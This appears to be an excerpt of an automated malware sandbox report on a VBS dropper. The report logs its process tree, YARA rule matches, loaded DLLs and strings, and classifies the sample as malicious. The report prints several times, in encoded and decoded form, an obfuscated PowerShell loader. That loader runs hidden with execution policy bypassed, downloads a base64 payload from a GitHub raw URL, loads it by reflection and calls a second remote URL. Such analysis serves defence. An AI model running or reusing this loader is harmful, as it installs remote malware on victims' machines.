    Source: powershell.exe, 00000004.00000002.1786311869.0000017821113000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/NoDetectOn/NoDetectOn/refs/heads/main/DetahNoth-V.txtmiM;
    Source: unknownNetwork traffic detected: HTTP traffic on port 49699 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49699
    Source: unknownHTTPS traffic detected: 185.199.108.133:443 -> 192.168.2.7:49699 version: TLS 1.2

    System Summary

    barindex
    Source: Process Memory Space: powershell.exe PID: 7596, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
    Source: Process Memory Space: powershell.exe PID: 7728, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
    Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnYTYnKyc4JysndXJsJysnID0gJysnbWlNJysnaHR0cHMnKyc6Ly9yYScrJ3cuZ2l0aHViJysndXNlcicrJ2MnKydvbnQnKydlJysnbicrJ3QuY29tJysnL05vRGUnKyd0ZWMnKyd0T24vTm9EJysnZScrJ3RlJysnYycrJ3RPbi9yZWYnKydzLycrJ2hlJysnYWRzLycrJ21haW4vRGUnKyd0JysnYWgnKydObycrJ3RoLVYudCcrJ3h0JysnbWlNOyBhNjhiJysnYXNlNjRDb24nKyd0ZW4nKyd0ID0nKycgKE5ldycrJy0nKydPYicrJ2plJysnYycrJ3QgU3knKydzJysndGVtJysnLk5ldC5XZWJDbGknKydlbnQpJysnLicrJ0QnKydvdycrJ25sb2FkJysnU3RyaScrJ25nKGEnKyc2OHVybCknKyc7ICcrJ2E2OGJpbmFyeUMnKydvJysnbnRlJysnbnQnKycgPSBbU3lzdGVtLkNvbnZlcnRdJysnOjpGJysncm8nKydtQicrJ2EnKydzJysnZTY0U3QnKydyaW5nKGE2OGInKydhc2U2NCcrJ0NvbicrJ3QnKydlbicrJ3QpOyBhJysnNjgnKydhJysnc3NlbWJseSAnKyc9IFtSZScrJ2YnKydsZWN0aW8nKyduLkFzc2VtYmx5XScrJzo6TG9hZChhJysnNjgnKydiaW5hcicrJ3lDbycrJ250JysnZW50KTsgW2RubCcrJ2liLklPLkgnKydvJysnbWVdJysnOjpWQUkodWJ6dHh0LicrJ1InKydWJysnVlJTLzEnKycwOCcrJy8xMzEnKycuJysnNDgxJysnLjInKyczMi4yJysnNzEvLzpwdHRodScrJ2J6LCcrJyB1YicrJ3pkZXNhJysndGl2YWRvdWInKyd6LCB1YnonKydkZScrJ3NhdGknKyd2YScrJ2RvdScrJ2J6JysnLCB1YnpkZXMnKydhJysndGl2JysnYWRvdWInKyd6LCB1YnpSJysnZWdBc20nKyd1YnonKycsIHViJysneicrJ3ViJysneix1JysnYnp1JysnYicrJ3onKycpJyktY3JlUExhY0UnbWlNJyxbQ0hBcl0zOSAgLWNyZVBMYWNFIChbQ0hBcl05NytbQ0hBcl01NCtbQ0hBcl01NiksW0NIQXJdMzYgLWNyZVBMYWNFICd1YnonLFtDSEFyXTM0KSB8IC4gKCAkUFNIT21lWzIxXSskcHNIT21FWzM0XSsnWCcp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnYTYnKyc4JysndXJsJysnID0gJysnbWlNJysnaHR0cHMnKyc6Ly9yYScrJ3cuZ2l0aHViJysndXNlcicrJ2MnKydvbnQnKydlJysnbicrJ3QuY29tJysnL05vRGUnKyd0ZWMnKyd0T24vTm9EJysnZScrJ3RlJysnYycrJ3RPbi9yZWYnKydzLycrJ2hlJysnYWRzLycrJ21haW4vRGUnKyd0JysnYWgnKydObycrJ3RoLVYudCcrJ3h0JysnbWlNOyBhNjhiJysnYXNlNjRDb24nKyd0ZW4nKyd0ID0nKycgKE5ldycrJy0nKydPYicrJ2plJysnYycrJ3QgU3knKydzJysndGVtJysnLk5ldC5XZWJDbGknKydlbnQpJysnLicrJ0QnKydvdycrJ25sb2FkJysnU3RyaScrJ25nKGEnKyc2OHVybCknKyc7ICcrJ2E2OGJpbmFyeUMnKydvJysnbnRlJysnbnQnKycgPSBbU3lzdGVtLkNvbnZlcnRdJysnOjpGJysncm8nKydtQicrJ2EnKydzJysnZTY0U3QnKydyaW5nKGE2OGInKydhc2U2NCcrJ0NvbicrJ3QnKydlbicrJ3QpOyBhJysnNjgnKydhJysnc3NlbWJseSAnKyc9IFtSZScrJ2YnKydsZWN0aW8nKyduLkFzc2VtYmx5XScrJzo6TG9hZChhJysnNjgnKydiaW5hcicrJ3lDbycrJ250JysnZW50KTsgW2RubCcrJ2liLklPLkgnKydvJysnbWVdJysnOjpWQUkodWJ6dHh0LicrJ1InKydWJysnVlJTLzEnKycwOCcrJy8xMzEnKycuJysnNDgxJysnLjInKyczMi4yJysnNzEvLzpwdHRodScrJ2J6LCcrJyB1YicrJ3pkZXNhJysndGl2YWRvdWInKyd6LCB1YnonKydkZScrJ3NhdGknKyd2YScrJ2RvdScrJ2J6JysnLCB1YnpkZXMnKydhJysndGl2JysnYWRvdWInKyd6LCB1YnpSJysnZWdBc20nKyd1YnonKycsIHViJysneicrJ3ViJysneix1JysnYnp1JysnYicrJ3onKycpJyktY3JlUExhY0UnbWlNJyxbQ0hBcl0zOSAgLWNyZVBMYWNFIChbQ0hBcl05NytbQ0hBcl01NCtbQ0hBcl01NiksW0NIQXJdMzYgLWNyZVBMYWNFICd1YnonLFtDSEFyXTM0KSB8IC4gKCAkUFNIT21lWzIxXSskcHNIT21FWzM0XSsnWCcp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxDJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFAAC56100D4_2_00007FFAAC56100D
    Source: iJEK0xwucj.vbsInitial sample: Strings found which are bigger than 50
    Source: Process Memory Space: powershell.exe PID: 7596, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
    Source: Process Memory Space: powershell.exe PID: 7728, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
    Source: classification engineClassification label: mal100.expl.evad.winVBS@6/6@1/2
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCacheJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7604:120:WilError_03
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_iehfy2qi.hzg.ps1Jump to behavior
    Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\iJEK0xwucj.vbs"
    Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
    Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
    Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\iJEK0xwucj.vbs"
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnYTYnKyc4JysndXJsJysnID0gJysnbWlNJysnaHR0cHMnKyc6Ly9yYScrJ3cuZ2l0aHViJysndXNlcicrJ2MnKydvbnQnKydlJysnbicrJ3QuY29tJysnL05vRGUnKyd0ZWMnKyd0T24vTm9EJysnZScrJ3RlJysnYycrJ3RPbi9yZWYnKydzLycrJ2hlJysnYWRzLycrJ21haW4vRGUnKyd0JysnYWgnKydObycrJ3RoLVYudCcrJ3h0JysnbWlNOyBhNjhiJysnYXNlNjRDb24nKyd0ZW4nKyd0ID0nKycgKE5ldycrJy0nKydPYicrJ2plJysnYycrJ3QgU3knKydzJysndGVtJysnLk5ldC5XZWJDbGknKydlbnQpJysnLicrJ0QnKydvdycrJ25sb2FkJysnU3RyaScrJ25nKGEnKyc2OHVybCknKyc7ICcrJ2E2OGJpbmFyeUMnKydvJysnbnRlJysnbnQnKycgPSBbU3lzdGVtLkNvbnZlcnRdJysnOjpGJysncm8nKydtQicrJ2EnKydzJysnZTY0U3QnKydyaW5nKGE2OGInKydhc2U2NCcrJ0NvbicrJ3QnKydlbicrJ3QpOyBhJysnNjgnKydhJysnc3NlbWJseSAnKyc9IFtSZScrJ2YnKydsZWN0aW8nKyduLkFzc2VtYmx5XScrJzo6TG9hZChhJysnNjgnKydiaW5hcicrJ3lDbycrJ250JysnZW50KTsgW2RubCcrJ2liLklPLkgnKydvJysnbWVdJysnOjpWQUkodWJ6dHh0LicrJ1InKydWJysnVlJTLzEnKycwOCcrJy8xMzEnKycuJysnNDgxJysnLjInKyczMi4yJysnNzEvLzpwdHRodScrJ2J6LCcrJyB1YicrJ3pkZXNhJysndGl2YWRvdWInKyd6LCB1YnonKydkZScrJ3NhdGknKyd2YScrJ2RvdScrJ2J6JysnLCB1YnpkZXMnKydhJysndGl2JysnYWRvdWInKyd6LCB1YnpSJysnZWdBc20nKyd1YnonKycsIHViJysneicrJ3ViJysneix1JysnYnp1JysnYicrJ3onKycpJyktY3JlUExhY0UnbWlNJyxbQ0hBcl0zOSAgLWNyZVBMYWNFIChbQ0hBcl05NytbQ0hBcl01NCtbQ0hBcl01NiksW0NIQXJdMzYgLWNyZVBMYWNFICd1YnonLFtDSEFyXTM0KSB8IC4gKCAkUFNIT21lWzIxXSskcHNIT21FWzM0XSsnWCcp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('a6'+'8'+'url'+' = '+'miM'+'https'+'://ra'+'w.github'+'user'+'c'+'ont'+'e'+'n'+'t.com'+'/NoDe'+'tec'+'tOn/NoD'+'e'+'te'+'c'+'tOn/ref'+'s/'+'he'+'ads/'+'main/De'+'t'+'ah'+'No'+'th-V.t'+'xt'+'miM; a68b'+'ase64Con'+'ten'+'t ='+' (New'+'-'+'Ob'+'je'+'c'+'t Sy'+'s'+'tem'+'.Net.WebCli'+'ent)'+'.'+'D'+'ow'+'nload'+'Stri'+'ng(a'+'68url)'+'; '+'a68binaryC'+'o'+'nte'+'nt'+' = [System.Convert]'+'::F'+'ro'+'mB'+'a'+'s'+'e64St'+'ring(a68b'+'ase64'+'Con'+'t'+'en'+'t); a'+'68'+'a'+'ssembly '+'= [Re'+'f'+'lectio'+'n.Assembly]'+'::Load(a'+'68'+'binar'+'yCo'+'nt'+'ent); [dnl'+'ib.IO.H'+'o'+'me]'+'::VAI(ubztxt.'+'R'+'V'+'VRS/1'+'08'+'/131'+'.'+'481'+'.2'+'32.2'+'71//:ptthu'+'bz,'+' ub'+'zdesa'+'tivadoub'+'z, ubz'+'de'+'sati'+'va'+'dou'+'bz'+', ubzdes'+'a'+'tiv'+'adoub'+'z, ubzR'+'egAsm'+'ubz'+', ub'+'z'+'ub'+'z,u'+'bzu'+'b'+'z'+')')-crePLacE'miM',[CHAr]39 -crePLacE ([CHAr]97+[CHAr]54+[CHAr]56),[CHAr]36 -crePLacE 'ubz',[CHAr]34) | . ( $PSHOme[21]+$psHOmE[34]+'X')"
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnYTYnKyc4JysndXJsJysnID0gJysnbWlNJysnaHR0cHMnKyc6Ly9yYScrJ3cuZ2l0aHViJysndXNlcicrJ2MnKydvbnQnKydlJysnbicrJ3QuY29tJysnL05vRGUnKyd0ZWMnKyd0T24vTm9EJysnZScrJ3RlJysnYycrJ3RPbi9yZWYnKydzLycrJ2hlJysnYWRzLycrJ21haW4vRGUnKyd0JysnYWgnKydObycrJ3RoLVYudCcrJ3h0JysnbWlNOyBhNjhiJysnYXNlNjRDb24nKyd0ZW4nKyd0ID0nKycgKE5ldycrJy0nKydPYicrJ2plJysnYycrJ3QgU3knKydzJysndGVtJysnLk5ldC5XZWJDbGknKydlbnQpJysnLicrJ0QnKydvdycrJ25sb2FkJysnU3RyaScrJ25nKGEnKyc2OHVybCknKyc7ICcrJ2E2OGJpbmFyeUMnKydvJysnbnRlJysnbnQnKycgPSBbU3lzdGVtLkNvbnZlcnRdJysnOjpGJysncm8nKydtQicrJ2EnKydzJysnZTY0U3QnKydyaW5nKGE2OGInKydhc2U2NCcrJ0NvbicrJ3QnKydlbicrJ3QpOyBhJysnNjgnKydhJysnc3NlbWJseSAnKyc9IFtSZScrJ2YnKydsZWN0aW8nKyduLkFzc2VtYmx5XScrJzo6TG9hZChhJysnNjgnKydiaW5hcicrJ3lDbycrJ250JysnZW50KTsgW2RubCcrJ2liLklPLkgnKydvJysnbWVdJysnOjpWQUkodWJ6dHh0LicrJ1InKydWJysnVlJTLzEnKycwOCcrJy8xMzEnKycuJysnNDgxJysnLjInKyczMi4yJysnNzEvLzpwdHRodScrJ2J6LCcrJyB1YicrJ3pkZXNhJysndGl2YWRvdWInKyd6LCB1YnonKydkZScrJ3NhdGknKyd2YScrJ2RvdScrJ2J6JysnLCB1YnpkZXMnKydhJysndGl2JysnYWRvdWInKyd6LCB1YnpSJysnZWdBc20nKyd1YnonKycsIHViJysneicrJ3ViJysneix1JysnYnp1JysnYicrJ3onKycpJyktY3JlUExhY0UnbWlNJyxbQ0hBcl0zOSAgLWNyZVBMYWNFIChbQ0hBcl05NytbQ0hBcl01NCtbQ0hBcl01NiksW0NIQXJdMzYgLWNyZVBMYWNFICd1YnonLFtDSEFyXTM0KSB8IC4gKCAkUFNIT21lWzIxXSskcHNIT21FWzM0XSsnWCcp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxDJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('a6'+'8'+'url'+' = '+'miM'+'https'+'://ra'+'w.github'+'user'+'c'+'ont'+'e'+'n'+'t.com'+'/NoDe'+'tec'+'tOn/NoD'+'e'+'te'+'c'+'tOn/ref'+'s/'+'he'+'ads/'+'main/De'+'t'+'ah'+'No'+'th-V.t'+'xt'+'miM; a68b'+'ase64Con'+'ten'+'t ='+' (New'+'-'+'Ob'+'je'+'c'+'t Sy'+'s'+'tem'+'.Net.WebCli'+'ent)'+'.'+'D'+'ow'+'nload'+'Stri'+'ng(a'+'68url)'+'; '+'a68binaryC'+'o'+'nte'+'nt'+' = [System.Convert]'+'::F'+'ro'+'mB'+'a'+'s'+'e64St'+'ring(a68b'+'ase64'+'Con'+'t'+'en'+'t); a'+'68'+'a'+'ssembly '+'= [Re'+'f'+'lectio'+'n.Assembly]'+'::Load(a'+'68'+'binar'+'yCo'+'nt'+'ent); [dnl'+'ib.IO.H'+'o'+'me]'+'::VAI(ubztxt.'+'R'+'V'+'VRS/1'+'08'+'/131'+'.'+'481'+'.2'+'32.2'+'71//:ptthu'+'bz,'+' ub'+'zdesa'+'tivadoub'+'z, ubz'+'de'+'sati'+'va'+'dou'+'bz'+', ubzdes'+'a'+'tiv'+'adoub'+'z, ubzR'+'egAsm'+'ubz'+', ub'+'z'+'ub'+'z,u'+'bzu'+'b'+'z'+')')-crePLacE'miM',[CHAr]39 -crePLacE ([CHAr]97+[CHAr]54+[CHAr]56),[CHAr]36 -crePLacE 'ubz',[CHAr]34) | . ( $PSHOme[21]+$psHOmE[34]+'X')"Jump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: mlang.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMemberRefProps source: powershell.exe, 00000004.00000002.1800253709.0000017831F0F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1819206039.00000178395F0000.00000004.08000000.00040000.00000000.sdmp
    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetHandler source: powershell.exe, 00000004.00000002.1800253709.0000017831F0F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1819206039.00000178395F0000.00000004.08000000.00040000.00000000.sdmp
    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeRefs source: powershell.exe, 00000004.00000002.1800253709.0000017831F0F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1819206039.00000178395F0000.00000004.08000000.00040000.00000000.sdmp
    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetParent source: powershell.exe, 00000004.00000002.1800253709.0000017831F0F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1819206039.00000178395F0000.00000004.08000000.00040000.00000000.sdmp
    Source: Binary string: dnlib.dotnet.pdb source: powershell.exe, 00000004.00000002.1825456759.00007FFAAC7A0000.00000004.00000800.00020000.00000000.sdmp
    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.ApplyEditAndContinue source: powershell.exe, 00000004.00000002.1800253709.0000017831F0F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1819206039.00000178395F0000.00000004.08000000.00040000.00000000.sdmp
